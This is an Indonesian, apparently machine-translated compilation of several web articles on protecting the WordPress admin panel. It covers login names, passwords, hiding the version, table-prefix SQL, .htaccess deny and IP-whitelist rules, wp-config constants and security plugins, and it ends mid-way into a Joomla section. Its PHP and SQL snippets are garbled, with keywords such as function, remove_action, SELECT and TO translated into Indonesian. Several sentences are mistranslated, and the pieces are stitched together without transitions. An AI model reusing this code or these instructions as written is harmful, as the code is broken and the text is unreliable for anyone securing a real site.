Mereka menyerang panel admin wordpress apa yang harus dilakukan. Perlindungan WordPress yang andal terhadap peretasan. Gunakan koneksi yang aman

Dari artikel tersebut Anda akan belajar:

1. Gunakan login yang baik.

Melindungi situs WordPress dimulai dengan dasar - membuat login yang bagus. Saat menginstal WordPress, pengguna sering menggunakan login yang ditawarkan oleh penginstal secara default, yaitu − admin. Inilah yang pertama-tama dicari oleh bot untuk mencari lubang dalam keamanan situs Anda. Dengan menggunakan login ini, Anda sudah memberikan setengah dari informasi yang diperlukan untuk peretas, dan mereka hanya perlu menebak kata sandinya.

Jika Anda telah menginstal platform dan sedang mengerjakan situs Anda, kemungkinan besar Anda tidak ingin menghapus penginstalan dan memulai dari awal untuk menggunakan login yang lebih aman. Ada jalan keluar:

Langkah 1 - Membuat Pengguna Baru

Masuk ke panel admin WordPress dan buat akun baru dengan login yang lebih kompleks, berikan akses penuh ke semua fungsi situs, mis. hak administrator.

Dari menu utama di sebelah kiri, pilih Pengguna >> Tambah Baru.

Masukkan semua informasi yang diperlukan untuk pengguna baru, tentukan peran mereka sebagai "Administrator" dan tekan "Tambahkan pengguna baru".

Langkah 2 - Menghapus pengguna admin

Setelah itu, logout dari sistem kontrol, login dengan yang baru Akun dan menghapus pengguna admin dari sistem dengan salah satu cara berikut:

Metode 1 – Dari menu utama di sebelah kiri pilih Pengguna >> Semua pengguna. Arahkan kursor ke nama pengguna admin dan Anda akan melihat fungsinya "Menghapus".

Metode 2 – Dari menu utama di sebelah kiri, pilih Pengguna >> Semua pengguna. Temukan pengguna admin, centang dan dari menu tarik-turun "Tindakan" Pilih "Menghapus". Setelah itu klik pada pilihan tersebut "Berlaku" di bawah daftar pengguna. Opsi ini berguna jika Anda perlu menghapus banyak pengguna sekaligus.

Anda juga dapat mengubah admin nama pengguna melalui kueri basis data:
UPDATE wp_users SET user_login = 'new_login' WHERE user_login = 'admin';

Metode ini memiliki minus: penulis untuk posting yang ditulis oleh pengguna admin, tidak akan diubah. Untuk memperbaikinya, Anda perlu membuat kueri lain ke database:
UPDATE wp_posts SET post_author = 'new_login' WHERE post_author = 'admin';

2. Gunakan kata sandi yang rumit dan unik.

Melindungi area admin WordPress, tentu saja, tidak mungkin dilakukan tanpa kata sandi yang kuat dan bagus. Penting agar unik dan menyertakan angka, huruf dari register yang berbeda, tanda baca, simbol, dan sebagainya. Kata sandi seperti: pass, 1q2w3e4r5t6y, 87654321, qwerty, abc123, 111111, 1234, tanggal lahir Anda, dll. – tidak dapat diandalkan, tetapi banyak pengguna terus menggunakannya. Contoh kata sandi yang baik: pcVaOF8r39. Tentu saja akan sulit bagi Anda untuk mengingat kata sandi seperti itu, tetapi untuk ini ada sejumlah program yang menyimpan dan menghasilkan kata sandi, dan juga dapat diintegrasikan ke dalam antarmuka browser Anda (misalnya, Agen Kata Sandi, KeyPass, Roboform, dll.)

Jika Anda masih ingin mengingat kata sandi Anda, kami sarankan Anda membuat kata sandi gabungan dari nama/kata yang Anda kenal dengan baik, dengan beberapa huruf/angka besar di tempat acak, dan beberapa karakter khusus di awal atau akhir . Kata sandi seperti itu juga akan sulit ditebak, tetapi cukup mudah untuk diingat.

Ingatlah untuk memperbarui kata sandi Anda secara teratur.

3. Perbarui versi WordPress Anda.

WordPress peduli dengan penggunanya dan itulah mengapa Anda dapat menemukan notifikasi logout di panel admin. versi baru. Kami menyarankan Anda memperbarui segera setelah Anda melihatnya, karena salah satu pelanggaran paling umum dalam keamanan situs Anda adalah penggunaan versi usang platform.

4. Sembunyikan versi WordPress.

WordPress secara default menambahkan nomor versi saat ini ke sumber file dan halaman Anda. Dan karena seringkali tidak selalu memungkinkan untuk memperbarui versi WordPress tepat waktu, ini bisa menjadi titik lemah situs Anda. Mengetahui versi WordPress yang Anda miliki, seorang peretas dapat melakukan banyak kerugian.

Dengan bantuan file function.php Anda dapat menonaktifkan tampilan informasi tentang versi platform Anda. Untuk melakukan ini, Anda perlu membuka file function.php, terletak di folder akar tema situs web Anda saat ini (wp-konten/tema/current_wordpress_theme), dan tambahkan kode berikut:
hapus_tindakan('wp_head', 'wp_generator');

Atau Anda dapat menambahkan kode berikut ke file function.php:

/* Sembunyikan string versi WP dari skrip dan gaya
* @return (string) $src
* @filter script_loader_src
* @filter style_loader_src
*/
fungsi fjarrett_remove_wp_version_strings($src) (
global $wp_version;
parse_str(parse_url($src, PHP_URL_QUERY), $query);
jika (!kosong($query['ver']) && $query['ver'] === $wp_version) (
$src = hapus_query_arg('ver', $src);
}
return $src;
}
add_filter('script_loader_src', 'fjarrett_remove_wp_version_strings');
add_filter('style_loader_src', 'fjarrett_remove_wp_version_strings');

/* Sembunyikan string versi WP dari meta tag generator */
fungsi wpmudev_remove_version() (
kembali";
}
add_filter('the_generator', 'wpmudev_remove_version');

Selain di atas, di folder tema WordPress mana pun, Anda akan menemukannya header.php mengajukan. Itu juga mencantumkan versi instalasi Anda, yang sangat menarik bagi seorang peretas, seperti yang disebutkan sebelumnya. Dengan menghapus baris berikut dari file, Anda akan menghilangkan informasi tambahan ini:

” />

5. Unduh tema dan plugin dari sumber tepercaya.

WordPress begitu tersebar luas sehingga semakin banyak pengembang yang membuat tema dan plugin siap pakai untuknya. Sementara sebagian besar dari mereka akan membuat situs Anda lebih mudah digunakan dan meningkatkan fungsinya, beberapa dapat menyembunyikan konsekuensi yang sangat tidak menyenangkan dalam bentuk virus dan membuka pintu bagi peretas. Gunakan hanya sumber unduhan tepercaya untuk tema dan plugin, seperti wordpress.org, dan perhatikan setiap peringatan tentang file berbahaya yang muncul. Seperti halnya WordPress itu sendiri, penting untuk selalu memperbarui plugin dengan versi terbaru.

6. Jangan menyimpan file yang tidak perlu.

Ekstensi yang tidak aktif dapat menimbulkan ancaman serius bagi keamanan situs Anda. Oleh karena itu, jangan ragu untuk menghapus semua plugin dan tema yang tidak terpakai. Misalnya, Anda menginstal untuk menguji dan memilih yang akan Anda gunakan. Setelah memilih, jangan lupa hapus semua yang tidak perlu.

7. Secara teratur periksa komputer lokal Anda apakah ada virus.

Mengambil berbagai langkah untuk mengamankan situs WordPress Anda baik-baik saja, tetapi Anda juga perlu mengawasi komputer Anda. Anda harus menginstal antivirus yang terus diperbarui. Jika tidak, Anda berisiko menginfeksi situs web Anda dengan mengunggah file virus.

8. Buat cadangan situs.

Tidak semua serangan jahat dapat dicegah, tetapi hanya satu serangan yang berhasil dapat menghancurkan semua upaya untuk bekerja di situs Anda. Kami merekomendasikan membuat cadangan situs web secara teratur. Banyak perusahaan hosting menyediakan opsi cadangan server dan dalam hal ini, Anda dapat memulihkan situs dari salinan yang tersedia di server.

Dengan menginstal plugin WordPress Database Backup, Anda juga dapat mengamankan database situs web Anda. Pengaturan plugin memungkinkan Anda mengatur opsi untuk mengirim cadangan basis data harian ke kotak surat kontak Anda.

9. Gunakan koneksi yang aman.

Jika Anda lebih suka mengunggah file menggunakan klien FTP, gunakan protokol koneksi server SFTP yang aman.

10. Buat file .htaccess.

Kode perlindungan hotlink:

Mesin Tulis Ulang Aktif
RewriteCond %(HTTP_REFERER) !^http://(.+\.)?domainanda\.com/
RewriteCond %(HTTP_REFERER) !^$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpg [L]

Hotlinking adalah penyisipan image dari server Anda ke website/blog orang lain. Lalu lintas langsung menuju ke server Anda.

Dengan kode di atas, Anda dapat memaksa server untuk memeriksa dari mana sebenarnya permintaan itu berasal: jika dari halaman situs web Anda, maka server memberikan gambar tersebut kepada pengguna tanpa masalah; jika dari situs web orang lain, itu menunjukkan gambar dengan kesalahan.

11. Ubah awalan tabel database.

Perlindungan WordPress terhadap peretas juga akan meningkat jika Anda menghapus awalan awal wp_- ini akan mempersulit pencarian penyusup. Mari pertimbangkan beberapa cara:

Metode 1 - Cocok untuk instalasi baru melalui Softaculous
Jika penyedia hosting Anda mengizinkan Anda menggunakan skrip Softaculous untuk menginstal WordPress, maka Anda dapat mengubah awalan selama penginstalan awal: di bagian Opsi Lanjutan, Anda perlu melakukan perubahan yang diperlukan.

Metode 2 – Untuk Situs Langsung dan Instalasi WordPress Baru
Jika WordPress Anda sudah lama diinstal dan situsnya berfungsi, Anda dapat mengubah awalan menggunakan program phpMyAdmin.

Pilih database yang diperlukan dari daftar dan buat kueri database berikut:

RENAME table `wp_commentmeta` KE `newprefix_commentmeta`;
RENAME table `wp_comments` KE `newprefix_comments`;
RENAME table `wp_links` KE `newprefix_links`;
RENAME table `wp_options` KE `newprefix_options`;
RENAME table `wp_postmeta` KE `newprefix_postmeta`;
RENAME table `wp_posts` KE `newprefix_posts`;
RENAME table `wp_terms` KE `newprefix_terms`;
RENAME table `wp_term_relationships` KE `newprefix_term_relationships`;
RENAME table `wp_term_taxonomy` KE `newprefix_term_taxonomy`;
RENAME table `wp_usermeta` KE `newprefix_usermeta`;
RENAME table `wp_users` KE `newprefix_users`;

di mana "awalan baru_" perlu diganti dengan awalan baru yang ingin Anda gunakan sebagai pengganti awalan "wp_".

Setelah itu, Anda akan melihat awalan baru di tabel database:

Untuk memastikan bahwa semua perubahan berhasil dan awalan wp_ tidak lagi digunakan di tabel _pilihan dan _usermeta, Anda perlu membuat kueri lain ke database:

PILIH * DARI `newprefix_options` DI MANA `nama_pilihan` SEPERTI '%wp_%'

PILIH * DARI `newprefix_usermeta` DI MANA `meta_key` SEPERTI '%wp_%'

Akibatnya, Anda dapat menemukan sejumlah awalan yang perlu Anda ganti namanya secara manual menggunakan tombol Mengubah:

Jumlah perubahan yang perlu Anda lakukan dapat bervariasi. Tapi semua awalan wp_ Anda harus mengubah awalan baru Anda agar situs web berfungsi dengan baik.

Setelah itu, jangan lupa juga untuk melakukan perubahan awalan wp-config.php mengajukan:

Anda juga dapat menggunakan plugin khusus untuk mengubah awalan basis data: Ubah awalan DB atau Ubah awalan tabel.

12. Batasi jumlah percobaan akses.

Paling sering, penyerang melakukan banyak upaya untuk memasuki situs Anda, mengambil kata sandi. Anda dapat mengonfigurasi sistem sehingga alamat IP diblokir selama beberapa jam setelah sejumlah upaya masuk yang gagal.

Untuk melakukannya, Anda dapat menggunakan plugin tambahan, seperti Login LockDown atau Limit Login Attempts. Dalam pengaturan plugin ini, Anda dapat mengatur sendiri jumlah upaya login dan waktu pemblokiran.

Selain itu, dimungkinkan untuk menghapus tampilan pesan yang menyatakan bahwa login dan kata sandi yang dimasukkan salah. Bagaimanapun, ini juga informasi yang dapat membantu penyerang.

Untuk menghapus output dari pesan ini, Anda perlu membuka file function.php, terletak di folder tema situs web Anda saat ini (wp-konten/tema/current_wordpress_theme) dan tambahkan kode ini:
add_filter('login_errors',create_function('$a', "return null;"));

13. Hapus readme.html dan license.txt.

File readme.html dan license.txt ada di folder root dari setiap instalasi WordPress. Anda tidak memerlukan file-file ini, dan file-file ini dapat mengekspos peretas ke kekejaman mereka. Misalnya, untuk mengetahui versi WordPress Anda saat ini dan banyak hal berguna lainnya untuk meretas situs web. Kami merekomendasikan untuk menghapusnya segera setelah menginstal WordPress.

14. Gunakan sertifikat SSL.

Untuk mentransfer informasi yang aman dan kerahasiaan pertukaran data, kami merekomendasikan penggunaan protokol SSL. Ini terutama berlaku untuk toko online jika Anda tidak ingin data pribadi tentang pelanggan Anda dikirimkan dengan cara yang tidak aman.

Pertama-tama, Anda harus menginstalnya untuk nama domain Anda.

Setelah itu, Anda dapat mengatur penggunaan wajib protokol SSL saat masuk ke panel kontrol situs Anda. Untuk melakukan ini, buka wp-config.php file yang terletak di folder root situs web Anda dan tambahkan baris berikut:
define('FORCE_SSL_ADMIN', true);

15. Modifikasi file wp-config.php.

Dengan menambahkan kode ini ke wp-config.php file, Anda juga dapat memperkuat perlindungan situs web Anda:

Pembatasan perubahan tema dan plugin:
define('DISALLOW_FILE_EDIT', true);

Menonaktifkan kemampuan untuk menginstal dan menghapus plugin:
define('DISALLOW_FILE_MODS', true);

Menambahkan kunci garam atau yang disebut kunci keamanan: Anda harus menemukan string tersebut terlebih dahulu wp-config.php mengajukan:

Anda akan melihat bahwa kunci sudah terpasang dan Anda dapat mengubahnya. Atau Anda akan melihat baris seperti ini: 'taruh frasa unik Anda di sini', yang menunjukkan bahwa kunci belum disetel:
/**#@+
* Otentikasi Kunci dan Garam Unik.
*
* Ubah ini menjadi frasa unik yang berbeda!
* Anda dapat membuatnya menggunakan layanan kunci rahasia (@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org)
* Anda dapat mengubahnya kapan saja untuk membatalkan semua cookie yang ada. Ini akan memaksa semua pengguna harus masuk lagi.
*
* @sejak 2.6.0
*/
define('AUTH_KEY', 'letakkan frasa unik Anda di sini');
define('SECURE_AUTH_KEY', 'letakkan frasa unik Anda di sini');
define('LOGGED_IN_KEY', 'letakkan frasa unik Anda di sini');
define('NONCE_KEY', 'letakkan frasa unik Anda di sini');
define('AUTH_SALT', 'letakkan frasa unik Anda di sini');
define('SECURE_AUTH_SALT', 'letakkan frasa unik Anda di sini');
define('LOGGED_IN_SALT', 'letakkan frasa unik Anda di sini');
define('NONCE_SALT', 'letakkan frasa unik Anda di sini');

Saya ingin menyebutkan beberapa plugin secara terpisah:

Ini adalah plugin keamanan WordPress yang memungkinkan Anda memindai situs web Anda dari kode berbahaya, lubang peretas, dan celah, menampilkan situs web real-time dan analitik lalu lintas. Ada juga kemungkinan mengatur pemindaian otomatis dan banyak lagi.

Plugin ini memeriksa situs web Anda untuk berbagai kerentanan keamanan dan menawarkan berbagai metode untuk memperbaikinya. Misalnya, kata sandi, izin file berbeda, perlindungan basis data, perlindungan informasi versi WordPress, perlindungan administrator, dan banyak lagi.

Plugin ini memungkinkan Anda untuk mengamankan akun pengguna dan login, database dan sistem file, mencegah serangan brute force (serangan menebak kata sandi), memindai situs, dan banyak lagi.

Sedih kedengarannya, melindungi WordPress adalah hal yang rumit, dan metode yang dijelaskan dalam artikel ini tidak menjamin 100% bahwa situs Anda akan sepenuhnya terlindungi dari aktivitas penipuan apa pun. Namun, mereka tidak boleh diabaikan, karena mereka akan secara signifikan mengurangi kemungkinan meretas situs oleh penyusup.

WordPress adalah CMS yang sangat populer, ini tidak diragukan lagi kelebihannya, ada banyak plugin untuk tugas apa pun, tetapi ini juga kelemahannya, karena semakin populer CMS untuk situs tersebut, semakin banyak serangan terhadapnya, lebih tepatnya, itu adalah lebih menarik bagi seorang peretas, karena setelah menemukan kerentanan Dengan WordPress, ratusan ribu situs terpapar penyerang, jadi melindungi situs WordPress Anda perlu perhatian khusus.

Mengapa situs WordPress diretas?

Semua CMS populer (mesin situs web) diretas, dan WordPress tidak terkecuali, saya meretas terutama dengan bantuan program yang disebut (skrip) - eksploitasi, untuk mendapatkan kendali atas situs, ini dilakukan terutama untuk membuat tautan dari situs Anda ke sumber daya lain, dan untuk membuat BotNet yang menangani serangan DDoS di server lain, sementara situs tetap beroperasi, dan Anda tidak akan pernah melihat dengan mata telanjang bahwa situs itu terinfeksi. Bagaimanapun, peretasan akan berdampak buruk pada situs Anda, dan Anda bahkan dapat menghilang dari hasil pencarian.

Seperti yang saya katakan, peretasan terjadi secara otomatis, tidak sulit untuk menentukan CMS suatu situs, ada banyak layanan online untuk ini, seringkali program penyerang mencoba menebak kata sandi dari bagian administratif situs, mis. pergi ke alamat situs-Anda.ru/wp-admin dan mencoba menebak kata sandi untuk pengguna Anda, tidak sulit untuk mengetahui nama pengguna, Anda menulis artikel di bawahnya, sehingga login akan terlihat oleh bot, mereka tahu di mana mencarinya. kecuali tentu saja Anda menutupnya dengan sebuah plugin, salah satunya akan kita bicarakan di bawah. Kata sandi dari administrator situs harus sangat rumit, tetapi meskipun kondisi ini terpenuhi, Anda tidak dapat membiarkan bot memilah (menyebabkan) kata sandi dari "panel admin", karena ini bukan beban yang diperlukan di server, bayangkan jika beberapa lusin bot dari berbagai belahan dunia melakukan ini.

Plugin untuk melindungi WordPress dari serangan

Mari beralih ke plugin, layak untuk mendengarkan beberapa, mari kita bicara tentang yang lebih sederhana dan lebih mudah dipahami, saya menggunakannya di banyak proyek saya, untuk pelanggan, ini mengatasi tugas melindungi situs dengan sangat baik -

Plugin ini cukup mudah dipelajari, dan 90% Russified, diinstal seperti plugin apa pun dari repositori WordPress, setelah penginstalan Anda perlu mengaktifkannya dan membuat pengaturan dasar. Itu muncul di menu utama di admin WordPress

Dasbor plugin Keamanan WP

Setelah pergi ke pengaturan plugin, kita masuk ke panel kontrol. Di sini Anda dapat membuat pengaturan penting utama.

  1. Ini menunjukkan 5 otorisasi terakhir di panel admin Anda, pengguna dan alamat IP ditunjukkan, misalnya, saya langsung melihat IP saya, hanya ada dua, jadi saya yakin orang lain mengetahui kata sandi saya dari bagian administratif .
  2. Bagian dari fungsi yang paling penting, semuanya harus disertakan di sini, dan Anda setuju dengan semuanya.
  3. Plugin ini dapat melacak perubahan file di hosting, dan dapat mengirim laporan ke email Anda, dan Anda selalu mengetahui file apa yang telah Anda ubah, ini sangat berguna jika Anda telah mengunggah beberapa skrip atau file apa pun dengan kode berbahaya , Anda akan segera melihatnya di laporan, satu-satunya negatif, setelah memperbarui plugin lain yang telah Anda instal atau mesin WordPress itu sendiri, WP Security akan melihat semua perubahan ini dan mengirimkan daftar besar kepada Anda, tetapi Anda dapat membiasakan diri dengan laporan ini , karena Anda tahu kapan Anda memperbarui file sendiri.
  4. Item ini mengubah alamat standar panel admin situs yoursite.ru/wp-admin menjadi yoursite.ru/luboe-slovo , ini akan menyelamatkan panel admin Anda dari beberapa peretas dan bot yang malang, tetapi sayangnya tidak dari semua orang, terutama yang sudah mahir menemukannya, saya dapat menilai ini dengan melihat bagian "Otorisasi", tetapi lebih dari itu nanti.
  5. Item ini harus dimatikan, seperti pada tangkapan layar, hanya diperlukan ketika Anda ingin melakukan pemeliharaan situs, pengunjung akan diberi tanda dengan pesan bahwa situs tersebut sedang menjalani pekerjaan teknis, terkadang berguna, misalnya , saat mengubah desain situs, atau dengan beberapa perubahan global, jangan lupa bahwa dalam mode ini robot pencari juga tidak dapat melihat situs Anda, jangan menutupnya dalam waktu lama.

Melindungi Admin WordPress dari Menebak Kata Sandi

Sekarang mari kita pergi ke item menu - Otorisasi, menurut saya item yang sangat berguna, dan harus dikonfigurasi, seperti yang ada di salah satu situs saya. dengan kehadiran sekitar 1000 orang, plugin menangkap lusinan percobaan per hari untuk menebak kata sandi ke panel admin, dan menambahkan alamat IP peretas ke daftar hitam, mis. memblokirnya sepenuhnya, situs berhenti merespons alamat IP ini, sehingga membatalkan upaya untuk mengambil kata sandi, di layar pengaturan yang saya lakukan.

  1. Saya meninggalkan jumlah upaya untuk "membuat kesalahan" -3, jangan kurangi, Anda sendiri dapat mengetik kata sandi yang salah, dan Anda harus masuk daftar hitam dengan IP Anda
  2. Ini adalah waktu setelah penghitung upaya login yang tidak valid diatur ulang.
  3. Periode pemblokiran alamat IP dari mana ada upaya otorisasi yang salah, saya atur lebih banyak, dalam hitungan menit, mis. mandi lama, di layar biayanya 6.000.000 menit, ini sekitar 11 tahun, saya rasa cukup

Semua IP yang diblokir akan ditolak aksesnya tidak hanya ke panel admin, tetapi ke seluruh situs, ingatlah ini

Daftar alamat IP yang diblokir

  1. alamat IP penyerang
  2. login yang kata sandinya dipilih, omong-omong, sudah benar
  3. tanggal ketika kunci otomatis dibuat

Daftar putih alamat untuk panel admin

Untuk mengizinkan akses ke bagian administratif situs WordPress hanya dari alamat IP tertentu, Anda dapat mengaktifkan daftar alamat putih di pengaturan plugin.

  1. mengaktifkan opsi ini
  2. di sini adalah alamat IP Anda saat ini
  3. di bidang ini masukkan semua alamat IP dari mana akses ke panel admin diizinkan

Jika Anda perlu menentukan kisaran alamat IP, alih-alih angka, gunakan tanda bintang, misalnya 192.168.5.* - konstruksi ini akan memberikan akses ke panel admin wordpress dari semua ip yang dimulai dengan angka-angka ini, metode ini dapat berguna bagi mereka yang tidak memiliki alamat ip khusus , dan terus berubah, misalnya, saat bekerja dengan Internet seluler, sebagai aturan, kisarannya akan tetap dalam dua digit pertama, seperti ini misalnya 192.168.*. *

Waktu membaca: 4 mnt

Setahun yang lalu, beban server saya sangat sering melebihi batas yang diizinkan oleh batas tarif. Pada saat yang sama, masalahnya bukan pada situs itu sendiri, tetapi pada serangan dangkal oleh penyusup di panel admin, untuk mendapatkan akses ke beberapa tujuan mereka.

Hari ini saya akan memberi tahu Anda bagaimana saya mengatasi masalah tersebut, yang saya sarankan untuk Anda lakukan untuk berjaga-jaga di rumah.

Akibatnya, diputuskan untuk mengubah alamat formulir login di panel admin, serta menutupi panel admin untuk semua orang luar yang tidak memiliki IP saya.

Perlu dicatat bahwa beberapa perusahaan hosting sendiri telah secara otomatis membuat alamat admin baru untuk semua pengguna. Jika Anda menggunakan layanan hosting semacam itu, jangan membaca artikel lebih lanjut dan jangan buang waktu.

Cara Mengubah Alamat Admin WordPress

Artikel ini sudah saya posting sebelumnya. Di sini tampaknya hasil yang serupa, tetapi efek dan tujuannya berbeda.

Jangan lupa untuk mencadangkan file tempat Anda bekerja.

  • Pertama, salin file wp-login.php dari root situs (tempat wp-config.php berada) ke ftp ke komputer Anda.
  • Ubah nama itu apa pun yang Anda suka. Misalnya vhod.php
  • Buka file ini dengan program Notepad++ gratis (atau apa pun yang ingin Anda edit) dan ganti semua frasa wp-login.php dengan vhod.php .

Anda dapat melakukannya dengan cepat dengan menekan CTRL+F di Notepad++. Nah, di jendela yang muncul, masukkan:

Jadi dalam sedetik saya mengganti kemunculan frase yang saya butuhkan di seluruh file. Itu muncul 12 kali.

Unggah file baru ke ftp.

Hal serupa perlu dilakukan di file general-template.php, yang akan Anda temukan di folder wp-includes di ftp. Itu. ubah kemunculan frase wp-login.php menjadi vhod.php , tetapi jangan ubah nama file itu sendiri!

Sekarang Anda memiliki file .htaccess di tempat yang sama di root situs. Kami juga menyalinnya ke komputer kami dan membukanya untuk diedit (Anda dapat menggunakan Notepad Windows biasa). Kami memasukkan potongan kode yang memblokir akses semua orang ke file wp-login.php

Pesan Tolak, Izinkan Tolak dari semua

< Files wp - login . php >

Pesanan Ditolak

Tolak dari semua

< / Files >

Langkah inilah yang menghilangkan beban, dan juga menyembunyikan formulir otorisasi. Beban telah dihapus dengan memasukkan kode yang disajikan ke dalam .htaccess: jika ada panggilan ke http://site.ru/wp-login.php, itu akan mengembalikan kesalahan 403, bukan 404.

Mari kita ulangi secara singkat algoritma kerja:

  • Ganti nama file wp-login.php menjadi nama arbitrer dan ganti kemunculan nama di dalamnya dengan yang baru.
  • Demikian pula, kami mengganti nama lama wp-login.php di file general-template.php dengan yang baru.
  • Kami meresepkan dalam file .htaccess larangan akses wp-login.php untuk semua orang

Setelah memperbarui WordPress, hanya file general-template.php yang perlu diperbaiki. Tapi sejak mesin tidak terlalu sering diperbarui - ini tidak seberapa dibandingkan dengan efeknya.

Kami membatasi masuk dengan IP melalui .htaccess

Sebagai tindakan tambahan untuk melindungi situs, saya mengadopsi batasan untuk memasuki panel admin dengan IP. Masalahnya diselesaikan dengan sangat sederhana: buat file .htaccess kosong dan tambahkan kode berikut ke dalamnya

order tolak, izinkan izinkan dari 192.168.0.1 tolak dari semua

perintah tolak, izinkan

izinkan dari 192.168.0.1

menyangkal dari semua

Kami menyimpan file dan mengunggahnya ke folder wp-admin di tempat yang sama di root situs.

Alih-alih IP saya dari contoh, masukkan yang asli. Selain itu, Anda dapat menambahkan masing-masing beberapa IP dari baris baru:

order tolak, izinkan izinkan dari 126.142.40.16 izinkan dari 195.234.69.6 tolak dari semua

perintah tolak, izinkan

izinkan dari 126.142.40.16

izinkan dari 195.234.69.6

menyangkal dari semua

Jika IP dinamis, maka Anda dapat memasukkan angka hanya hingga titik pertama-kedua-ketiga:

Apakah Anda sudah tahu cara masuk ke admin area WordPress?

Anda dapat melakukan ini setidaknya dalam empat cara dengan menambahkan yang berikut ke alamat situs Anda:

  1. /admin, mis. seperti ini: http://yoursite/admin
  2. / wp-admin
  3. /Gabung
  4. /wp-login.php

Secara umum, ketiga opsi pertama dengan mengarahkan ulang (redirect) akan tetap membawa Anda ke halaman: http://your_site/wp-login.php

Ternyata siapa pun dapat menambahkan salah satu dari empat awalan yang dijelaskan di atas ke alamat situs Anda dan melihat pintu masuk panel admin:

Tentu saja, ini tidak berarti sama sekali bahwa siapa pun juga dapat dengan mudah masuk ke panel admin, karena dia masih perlu mengetahui Nama Pengguna atau email Anda dan kata sandi Anda.

Jika pengguna administrator Anda memiliki login: - maka ini sama sekali tidak bijaksana di pihak Anda dan penyerang hanya perlu menebak atau menebak kata sandi Anda.

Selain itu, apakah Anda melihat tulisan: Nama pengguna atau email ? Ya, ya, itu adalah email yang dapat digunakan WordPress sebagai Nama Pengguna. Tapi Anda bisa menentukan alamat email di suatu tempat di situs yang cocok dengan email pengguna administrator. Ternyata hal pertama yang bisa dicoba penyerang adalah memasukkan email Anda dan di sini WordPress akan membantunya lagi, karena jika email tidak cocok, dia akan melihat pesan ini:

dan jika emailnya benar, WordPress akan menulis bahwa kata sandinya salah:

Akibatnya, kami mengalami situasi di mana calon penyerang hanya perlu menebak atau menebak kata sandi Anda untuk meretas situs Anda (akses ke panel admin).

Bagaimana cara melindungi pintu masuk panel admin dari potensi ancaman? Jawabannya sederhana - coba tingkatkan jumlah yang tidak diketahui yang diperlukan untuk masuk.

Dan sekarang mari kita lihat lebih dekat:

  1. Jika memungkinkan, pastikan email pengguna administrator tidak disebutkan di mana pun di situs - email publik harus sesuatu yang lain.
  2. Kata sandi Anda seharusnya tidak sederhana, ketika menginstal WordPress itu sendiri menghasilkan kata sandi yang rumit untuk Anda, jika Anda tidak ingin menggunakannya, buatlah kata sandi yang kurang lebih rumit yang mencakup karakter kecil dan besar, angka dan beberapa karakter seperti -, ?, _ dll.
  3. Nama pengguna Anda juga tidak boleh sederhana, tidak: admin, manajer, root, administrator, pengguna dan kata-kata sederhana lainnya!
  4. Dan terakhir, Anda harus memasukkan yang paling penting ketiga yang tidak diketahui - ubah URL login admin, untuk ini, instal plugin sederhana: WPS Hide Login
Login Sembunyikan WPS

Plugin sederhana, gratis, dan cukup populer yang memungkinkan Anda mengubah URL login admin.

Setelah menginstal dan mengaktifkan plugin, Anda harus pergi ke bagian admin: Pengaturan / Umum, lalu gulir ke bagian paling bawah laman dan lihat hanya satu parameter yang ditambahkan oleh plugin ini:

Secara default, plugin menyarankan untuk menggunakan login http://yoursite/login - tetapi ini sama sekali bukan pilihan terbaik! Munculkan sesuatu milik Anda sendiri, misalnya: yyy12_go)))

Setelah mengubah parameter ini, jangan lupa klik tombolnya Simpan perubahan– jika tidak, saat plugin aktif, Anda akan masuk melalui http://yoursite/login

Pastikan untuk mencoba keluar dan masuk lagi ke panel admin, tetapi pada alamat masuk baru yang Anda buat sendiri, dan yang terpenting, jangan lupakan itu!

Setelah mengubah titik masuk ke panel admin, saat mencoba mengakses URL standar, pengguna akan menerima halaman kesalahan 404.

Perhatian! Jika Anda tiba-tiba lupa alamat login admin yang baru, Anda harus menonaktifkan plugin ini. Anda dapat melakukannya tanpa masuk ke panel admin jika Anda memiliki akses ke folder dan file situs. Anda hanya perlu mengganti nama atau menghapus folder plugin wps-sembunyikan-login, yang akan ada di folder plugin(folder plugin ada di folder wp-content).

Akibatnya: setelah menerapkan semua tindakan di atas, kita harus mendapatkan perlindungan login panel admin dengan tiga hal yang tidak diketahui: Email / Nama Pengguna, kata sandi yang rumit, dan URL login uniknya sendiri - dan ini dapat sangat mempersulit upaya anak muda peretas)

Halo, para pembaca situs blog yang budiman. Hari ini saya ingin berbicara tentang keamanan pekerjaan dan beberapa metode untuk melindungi situs dari peretasan. Sayangnya, saya bukan ahli dalam bidang ini dan pengetahuan saya tidak melampaui cakupan artikel tentang, tetapi saya hanya akan menjelaskan pengalaman saya baru-baru ini. Saya belum menggunakan sesuatu yang rumit, tetapi saya berharap ini akan meningkatkan keamanan bekerja dengan situs saya.

Ini akan menjadi tentang otentikasi ganda untuk masuk ke panel admin mesin situs Anda (seharusnya berfungsi di CMS apa pun, tetapi saya pribadi hanya menguji di WordPress dan Joomla). Perlindungan diatur di tingkat server, jadi semua upaya untuk menebak kata sandi ke panel admin (kekerasan) tidak akan menambah beban pada hosting dan cukup sulit untuk melewatinya. Itu diatur dengan mudah (secara harfiah dalam beberapa langkah) dan dari semua pengetahuan itu hanya membutuhkan perhatian dan kemampuan untuk mengakses situs melalui FTP.

Yah, saya juga akan memberikan beberapa tindakan yang saya terapkan ke situs di mesin Joomla 1.5 yang sudah usang, yang tidak masuk akal untuk saya transfer, tetapi mereka terus-menerus merusak dan menggunakan server untuk mengirim spam. Saya melakukan tindakan yang dijelaskan baru-baru ini, jadi saya tidak dapat menyatakan fakta bahwa infeksi situs dengan virus telah berhenti, tetapi saya harap demikian. Secara umum, saya mencoba sedikit meningkatkan resistensi hack Joomla 1.5.

Bagaimana melindungi Joomla 1.5 dari peretasan dan virus

Seperti yang saya sebutkan di atas, masalahnya terletak pada peretasan konstan dari dua situs saya, yang menjalankan Joomla 1.5. Anda dapat menganggapnya ditinggalkan, karena saya tidak menambahkan materi baru ke dalamnya, tetapi mereka secara teratur menghasilkan pendapatan (dari posting artikel dari Miralinks dan Webartex, serta tautan dari Gogetlinks). Secara umum, sayang untuk membuangnya, tetapi untuk mentransfernya ke versi baru mesin "untuk memo" (sayang sekali untuk waktu dan tenaga yang dihabiskan).

